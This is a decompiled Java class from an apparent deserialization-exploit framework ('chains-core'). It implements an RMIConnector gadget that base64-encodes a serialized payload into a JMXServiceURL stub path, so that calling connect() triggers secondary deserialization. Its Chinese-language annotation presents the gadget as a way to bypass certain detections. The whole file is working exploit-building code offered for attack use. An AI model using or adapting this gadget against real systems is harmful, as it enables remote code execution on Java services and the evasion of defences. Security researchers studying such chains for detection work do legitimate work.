package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.CommonMethod;
import com.ar3h.chains.common.util.Reflections;
import java.util.Map;
import javax.management.remote.JMXServiceURL;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "RMIConnector二次反序列化", description = "通过connect()方法触发本链，实现二次反序列化\n这个触发点比较特殊既不是getter类方法，也不是toString、equals等特殊方法，所以适用于在特定场合绕过一些检测", dependencies = {"jdk:javax.management.remote.rmi.RMIConnector"})
@GadgetTags(tags = {Tag.RMIConnectorChain, Tag.SpecialPublicMethod}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/RMIConnector.class */
public class RMIConnector implements Gadget {
    private final String methodName = "connect";

    public Object getObject(Object obj) throws Exception {
        String encodeBase64String = Base64.encodeBase64String(CommonMethod.handleSerialized(obj));
        JMXServiceURL jMXServiceURL = new JMXServiceURL("service:jmx:rmi://");
        Reflections.setFieldValue(jMXServiceURL, "urlPath", "/stub/" + encodeBase64String);
        return new javax.management.remote.rmi.RMIConnector(jMXServiceURL, (Map) null);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object doCreate = gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.SPECIAL_METHOD_NAME_KEY, "connect");
        return getObject(doCreate);
    }
}
